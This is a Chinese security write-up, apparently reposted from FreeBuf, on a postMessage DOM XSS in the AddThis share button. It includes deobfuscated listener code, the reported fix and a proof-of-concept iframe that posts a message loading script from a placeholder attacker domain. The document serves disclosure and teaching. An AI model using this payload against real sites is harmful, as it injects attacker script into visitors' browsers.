流行应用AddThis存在postMessage XSS漏洞漏洞,百万站点受影响

安全 漏洞
AddThis是一款拥有超过一百万用户使用的网页分享按钮。在今年早些被发现存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文将描述我是如何识别然后利用AddThis分享按钮中存在的这些漏洞。

AddThis是一款拥有超过一百万用户使用的网页分享按钮。在今年早些被发现存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文将描述我是如何识别然后利用AddThis分享按钮中存在的这些漏洞。

[[179806]]

当我在测试一个使用AddThis的网站的时候,透过Chrome开发者工具的全局监听器,我注意到它使用了postMessage。

使用AddThis的网站的时候使用了postMessage

为了判断它们是否存在漏洞,我在Chrome开发者工具中的的监听器内设置了一个断点,之后使用

  1. window.postMessage("hello", "*") 

向页面发送消息

检查监听器

代码没有进行来源检查,除此之外来源必须是HTTP/HTTPS页面。从5364行可以得知消息的预期格式:

  1. at-share-bookmarklet:DATA. 

应用AddThis检查监听器

继续进行调试,我们以合适的格式发送消息,使代码在5370行结束,调用r函数。

完成对r函数的调用之后接着调用s函数:

应用AddThis检查监听器

说起S函数就非常有趣。它似乎创建了一个新的脚本元素(或许是DOM XSS?)

应用AddThis检查监听器

反压缩

为了理解这个函数的作用,我通过命名变量和删除多行语句来进行反混淆。

  1. e.exports = function(messageData, t, n, s, u, isTrue) { 
  2. if (!o[messageData] || isTrue) { //isTrue is 1 (true) when this function is called. 
  3. var scriptTag = document.createElement("script"); 
  4. if("https:" === window.location.protocol){ 
  5. var isSecurePage = true
  6. }else{ 
  7. var isSecurePage = false
  8. var protocol = ""
  9. var headElement = document.getElementsByTagName("head")[0]; 
  10. scriptTag.setAttribute("type", "text/javascript"); 
  11. scriptTag.setAttribute("async", "async"); 
  12. //Check if user is using Chrome/Safari 
  13. if(window.chrome && window.chrome.self || window.safari && window.safari.extension){ 
  14. if(isSecurePage){ 
  15. protocol = "https"
  16. }else{ 
  17. protocol = "http"
  18. //If the message data starts with "//", add protocol before 
  19. if(0 === messageData.indexOf("//")){ 
  20. messageData = protocol + messageData; 
  21. //If the message data starts with "//" 
  22. if(0 === messageData.indexOf("//")){ 
  23. scriptTag.src = messageData
  24. }else{ 
  25. scriptTag.src = protocol + "//s7.addthis.com/" + messageData; 
  26. headElement.insertBefore(scriptTag, headElement.firstChild); 
  27. o[messageData] = 1; 
  28. return scriptTag; 
  29. return 1; 

阅读经过反压缩的代码版本,可以得出结论,发送消息的格式大抵如此:

  1. at-share-bookmarklet://ATTACKERHOST/xss.js 

它会新增一个新的脚本元素到包含了“//ATTACKERDOMAIN/xss.js”的页面。换句话说,存在DOM XSS漏洞。

POC

攻击者能够攻击任何使用了AddThis的网站(存在DOM XSS)。给出我写的exploit供大家参考:

  1. <iframe id="frame" src="https://targetpage/using_addthis"></iframe> 
  2. <script> 
  3. document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); 
  4. </script> 

 

修复

我和Matt Abrams(AddThis的CTO)进行了交流,他保证会尽快修复该漏洞并及时推送给终端用户。该修复方案增加了一个来源检查以确保消息不会从未知来源发出。

总结

简言之,postMessage通常会导致DOM XSS漏洞。如果你正在使用第三方脚本,一定要去检查下postMessage实现。

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2022-04-14 16:37:50

漏洞网络攻击插件

2023-07-10 21:25:20

2022-07-20 16:04:15

iOS苹果App Store

2020-07-30 23:17:45

漏洞网络安全攻击

2023-07-27 16:48:13

2021-09-05 05:59:00

BrakTooth漏洞蓝牙设备

2022-05-05 11:33:10

漏洞网络攻击网络安全

2016-03-29 10:48:53

2011-10-09 15:03:15

手机

2014-04-09 14:41:55

2021-01-28 17:32:44

Sudo漏洞Linux发行版

2009-05-30 10:04:56

2015-03-13 09:20:57

2021-09-17 11:03:25

HP OMEN漏洞攻击

2023-05-08 19:28:11

2022-08-15 08:28:52

漏洞底层框架Electron

2015-09-23 11:42:20

2014-07-22 10:43:16

2014-04-29 11:18:27

2009-07-29 08:46:13

Windows 7系统漏洞系统安全
点赞
收藏

51CTO技术栈公众号